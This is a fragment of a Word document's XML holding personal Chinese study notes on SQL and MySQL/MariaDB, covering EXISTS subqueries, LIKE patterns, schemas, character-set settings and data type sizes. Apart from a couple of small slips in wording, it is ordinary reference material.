        <w:t>是１对多的关系</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.ID =&gt; B.AID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SELECT ID,NAME FROM A WHERE EXISTS (SELECT * FROM B WHERE A.ID=B.AID)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>执行结果为</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>1 A1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>2 A2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>原因可以按照如下分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SELECT ID,NAME FROM A WHERE EXISTS (SELECT * FROM B WHERE B.AID=</w:t>
      </w:r>
      <w:r>
        <w:t>１</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>---&gt;SELECT * FROM B WHERE B.AID=</w:t>
      </w:r>
      <w:r>
        <w:t>１有值返回真所以有数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SELECT ID,NAME FROM A WHERE EXISTS (SELECT * FROM B WHERE B.AID=2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>---&gt;SELECT * FROM B WHERE B.AID=</w:t>
      </w:r>
      <w:r>
        <w:t>２有值返回真所以有数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SELECT ID,NAME FROM A WHERE EXISTS (SELECT * FROM B WHERE B.AID=3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>---&gt;SELECT * FROM B WHERE B.AID=</w:t>
      </w:r>
      <w:r>
        <w:t>３无值返回真所以没有数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>查询：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>在查询结果中显示列名：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>a.</w:t>
      </w:r>
      <w:r>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:t>关键字：</w:t>
      </w:r>
      <w:r>
        <w:t>select name as ’</w:t>
      </w:r>
      <w:r>
        <w:t>姓名</w:t>
      </w:r>
      <w:r>
        <w:t>’from students order by age</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t>直接表示：</w:t>
      </w:r>
      <w:r>
        <w:t>select name ’</w:t>
      </w:r>
      <w:r>
        <w:t>姓名</w:t>
      </w:r>
      <w:r>
        <w:t>’from students order by age</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t>精确查找</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>a.</w:t>
      </w:r>
      <w:r>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t>限定范围：</w:t>
      </w:r>
      <w:r>
        <w:t>select * from students where native in (’</w:t>
      </w:r>
      <w:r>
        <w:t>湖南</w:t>
      </w:r>
      <w:r>
        <w:t>’, ’</w:t>
      </w:r>
      <w:r>
        <w:t>四川</w:t>
      </w:r>
      <w:r>
        <w:t>’)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>b.between...and</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>select * from students where age between 20 and 30</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>c.“=”</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>select * from students where name = ’</w:t>
      </w:r>
      <w:r>
        <w:t>李山</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>d.like:select * from students where name like ’</w:t>
      </w:r>
      <w:r>
        <w:t>李</w:t>
      </w:r>
      <w:r>
        <w:t>%’(</w:t>
      </w:r>
      <w:r>
        <w:t>注意查询条件中有</w:t>
      </w:r>
      <w:r>
        <w:t>“%”</w:t>
      </w:r>
      <w:r>
        <w:t>，则说明是部分匹配，而且还有先后信息在里面，即查找以</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>李</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>开头的匹配项。所以若查询有</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>李</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的所有对象，应该命令：</w:t>
      </w:r>
      <w:r>
        <w:t>’%</w:t>
      </w:r>
      <w:r>
        <w:t>李</w:t>
      </w:r>
      <w:r>
        <w:t>%’;</w:t>
      </w:r>
      <w:r>
        <w:t>若是第二个字为李，则应为</w:t>
      </w:r>
      <w:r>
        <w:t>’_</w:t>
      </w:r>
      <w:r>
        <w:t>李</w:t>
      </w:r>
      <w:r>
        <w:t>%’</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>’_</w:t>
      </w:r>
      <w:r>
        <w:t>李</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>’_</w:t>
      </w:r>
      <w:r>
        <w:t>李</w:t>
      </w:r>
      <w:r>
        <w:t>_’</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>e.[]</w:t>
      </w:r>
      <w:r>
        <w:t>匹配检查符：</w:t>
      </w:r>
      <w:r>
        <w:t>select * from courses where cno like ’[AC]%’(</w:t>
      </w:r>
      <w:r>
        <w:t>表示或的关系，与</w:t>
      </w:r>
      <w:r>
        <w:t>"in(...)"</w:t>
      </w:r>
      <w:r>
        <w:t>类似，而且</w:t>
      </w:r>
      <w:r>
        <w:t>"[]"</w:t>
      </w:r>
      <w:r>
        <w:t>可以表示范围，如：</w:t>
      </w:r>
      <w:r>
        <w:t>select * from courses where cno like ’[A-C]%’)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>对于时间类型变量的处理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>a.smalldatetime</w:t>
      </w:r>
      <w:r>
        <w:t>：直接按照字符串处理的方式进行处理，例如：</w:t>
      </w:r>
      <w:r>
        <w:t>select * from students where birth &gt; = ’1980-1-1’and birth &lt;= ’1980-12-31’</w:t>
      </w:r>
      <w:r>
        <w:t>。不过我是采用了数字型的判断，如果日期采用字符串型的判断就需要将同一长度，就像身份证中间那样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>默认情况下一个用户对应一个集合，用户的</w:t>
      </w:r>
      <w:r>
        <w:t>schema</w:t>
      </w:r>
      <w:r>
        <w:t>名等于用户名，并作为该用户缺省</w:t>
      </w:r>
      <w:r>
        <w:t>schema</w:t>
      </w:r>
      <w:r>
        <w:t>。所以</w:t>
      </w:r>
      <w:r>
        <w:t>schema</w:t>
      </w:r>
      <w:r>
        <w:t>集合看上去像用户名。我们访问一个表时，没有指明该表属于哪一个</w:t>
      </w:r>
      <w:r>
        <w:t>schema</w:t>
      </w:r>
      <w:r>
        <w:t>中的，系统就会自动给我们在表上加上缺省的</w:t>
      </w:r>
      <w:r>
        <w:t>shema</w:t>
      </w:r>
      <w:r>
        <w:t>名。这一点</w:t>
      </w:r>
      <w:r>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t>中可以体会到。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>模式的定义</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">CREATE SCHEMA schemaname [ AUTHORIZATION username ] [ schema_element [ ... ] </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>CREATE SCHEMA AUTHORIZATION username [ schema_element [ ... ] ]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>DROP SCHEMA name [, ...] [ CASCADE | RESTRICT ]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [test2]&gt; select * from test order by birthday;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+-----------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| name      | birthday |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+-----------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:r>
        <w:t>转存表</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    |        2 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| a         |        2 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| b         |        3 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| c         |        4 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| e         |        5 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+-----------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>5 rows in set (0.00 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [test2]&gt; insert into test set name='f',birthdat=2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>ERROR 1054 (42S22): Unknown column 'birthdat' in 'field list'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>编码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>5.5.3</w:t>
      </w:r>
      <w:r>
        <w:t>之后增加了这个</w:t>
      </w:r>
      <w:r>
        <w:t>utf8mb4</w:t>
      </w:r>
      <w:r>
        <w:t>的编码，</w:t>
      </w:r>
      <w:r>
        <w:t>mb4</w:t>
      </w:r>
      <w:r>
        <w:t>就是</w:t>
      </w:r>
      <w:r>
        <w:t>most bytes 4</w:t>
      </w:r>
      <w:r>
        <w:t>的意思，专门用来兼容四字节的</w:t>
      </w:r>
      <w:r>
        <w:t>unicode</w:t>
      </w:r>
      <w:r>
        <w:t>。好在</w:t>
      </w:r>
      <w:r>
        <w:t>utf8mb4</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>utf8</w:t>
      </w:r>
      <w:r>
        <w:t>的超集，除了将编码改为</w:t>
      </w:r>
      <w:r>
        <w:t>utf8mb4</w:t>
      </w:r>
      <w:r>
        <w:t>外不需要做其他转换。当然，为了节省空间，一般情况下使用</w:t>
      </w:r>
      <w:r>
        <w:t>utf8</w:t>
      </w:r>
      <w:r>
        <w:t>也就够了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">SHOW VARIABLES LIKE 'character_set_%'; </w:t>
      </w:r>
      <w:r>
        <w:t>然后不是</w:t>
      </w:r>
      <w:r>
        <w:t>utf8</w:t>
      </w:r>
      <w:r>
        <w:t>系列的</w:t>
      </w:r>
      <w:r>
        <w:t>set =</w:t>
      </w:r>
      <w:r>
        <w:t>一下？软用，只是临时更改，关键还是改配置文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a8"/>
          </w:rPr>
          <w:t>https://stackoverflow.com/questions/3513773/change-mysql-default-character-set-to-utf-8-in-my-cnf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>不过似乎</w:t>
      </w:r>
      <w:r>
        <w:t>character_set_filesystem</w:t>
      </w:r>
      <w:r>
        <w:t>应该是</w:t>
      </w:r>
      <w:r>
        <w:t>binary</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>set names utf8;&lt;=&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">    SET character_set_client = utf8;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">    SET character_set_results = utf8;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">    SET character_set_connection = utf8; </w:t>
      </w:r>
      <w:r>
        <w:t>这三句话</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我配置改错了，导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:t>d.sock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件在启动的时候没有，数据库启动失败</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>安全：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>使用不存在的账户名（密码是没有）居然可以进入数据库。虽然没有权限。而且</w:t>
      </w:r>
      <w:r>
        <w:t>show</w:t>
      </w:r>
      <w:r>
        <w:t>看到的数据库只有被授权的以及默认的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> information_schema </w:t>
      </w:r>
      <w:r>
        <w:t>数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>其实里面也是有按照字节划分类型的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>数字类型：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:t>数据库将字段的数据类型</w:t>
      </w:r>
      <w:r>
        <w:t>BOOL/BOOLEAN</w:t>
      </w:r>
      <w:r>
        <w:t>默认地转换成</w:t>
      </w:r>
      <w:r>
        <w:t>TINYINT(1)</w:t>
      </w:r>
      <w:r>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>TINYINT</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>SMALLINT</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>MEDIUMINT</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>INT</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>INTEGER</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>BIGINT 1</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>2,3,4</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>FLOAT</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>DOUBLE 4,8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>还有种</w:t>
      </w:r>
      <w:r>
        <w:t>DECIMAL</w:t>
      </w:r>
      <w:r>
        <w:t>类型，有点怪，不管它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>时间类型：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>DATETIME</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>DATE</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>TIMESTAMP</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>TIME</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>YEAR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>字符串类型：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>CHAR</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>0-255</w:t>
      </w:r>
      <w:r>
        <w:t>字节</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>定长字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>VARCHAR</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>0-255</w:t>
      </w:r>
      <w:r>
        <w:t>字节</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>变长字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>TINYBLOB</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>0-255</w:t>
      </w:r>
      <w:r>
        <w:t>字节</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>不超过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 255 </w:t>
      </w:r>
      <w:r>
        <w:t>个字符的二进制字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>TINYTEXT</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>0-255</w:t>
      </w:r>
      <w:r>
        <w:t>字节</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>短文本字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>BLOB</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>0-65535</w:t>
      </w:r>
      <w:r>
        <w:t>字节</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>二进制形式的长文本数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>TEXT</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>0-65535</w:t>
      </w:r>
      <w:r>
        <w:t>字节</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>长文本数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MEDIUMBLOB</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>0-16 777 215</w:t>
      </w:r>
      <w:r>
        <w:t>字节</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>二进制形式的中等长度文本数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MEDIUMTEXT</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>0-16 777 215</w:t>
      </w:r>
      <w:r>
        <w:t>字节</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>中等长度文本数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>LOGNGBLOB</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>0-4 294 967 295</w:t>
      </w:r>
      <w:r>
        <w:t>字节</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>二进制形式的极大文本数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>LONGTEXT</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>0-4 294 967 295</w:t>
      </w:r>
      <w:r>
        <w:t>字节</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>极大文本数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>VARCHAR</w:t>
      </w:r>
      <w:r>
        <w:t>。存储变长数据，但存储效率没有</w:t>
      </w:r>
      <w:r>
        <w:t>CHAR</w:t>
      </w:r>
      <w:r>
        <w:t>高。如果一个字段可能的值是不固定长度的，我们只知道它不可能超过</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>个字符，把它定义为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VARCHAR(10)</w:t>
      </w:r>
      <w:r>
        <w:t>是最合算的。</w:t>
      </w:r>
      <w:r>
        <w:t>VARCHAR</w:t>
      </w:r>
      <w:r>
        <w:t>类型的实际长度是它的值的实际长度</w:t>
      </w:r>
      <w:r>
        <w:t>+1</w:t>
      </w:r>
      <w:r>
        <w:t>。为什么</w:t>
      </w:r>
      <w:r>
        <w:t>“+1”</w:t>
      </w:r>
      <w:r>
        <w:t>呢？这一个字节用于保存实际使用了多大的长度。从空间上考虑，用</w:t>
      </w:r>
      <w:r>
        <w:t>varchar</w:t>
      </w:r>
      <w:r>
        <w:t>合适；从效率上考虑，用</w:t>
      </w:r>
      <w:r>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:t>合适，关键是根据实际情况找到权衡点。可以不给</w:t>
      </w:r>
      <w:r>
        <w:t>varchar</w:t>
      </w:r>
      <w:r>
        <w:t>指定最大长度。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">varchar(5)  </w:t>
      </w:r>
      <w:r>
        <w:t>这里的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5 </w:t>
      </w:r>
      <w:r>
        <w:t>限制的是储存字符的个数，字符不分贵贱（不分</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>中文、英文、数字</w:t>
      </w:r>
      <w:r>
        <w:t>...</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:t>中设置了储存类型后，储存是定长的，也就是说，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">int(1) </w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> int(4) </w:t>
      </w:r>
      <w:r>
        <w:t>在硬盘中所占的字节数都是一样的。区别在于如果列制定了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">zerofill </w:t>
      </w:r>
      <w:r>
        <w:t>就会用</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>填充显示，这时候显示的数字个数不同。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tinyint(1)  </w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tinyint(3) </w:t>
      </w:r>
      <w:r>
        <w:t>没什么区别，占用字节都是一位，存储范围都是一样的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>email IS NULL&lt;/=&gt; email=NULL(NULL</w:t>
      </w:r>
      <w:r>
        <w:t>表示字段值为空</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
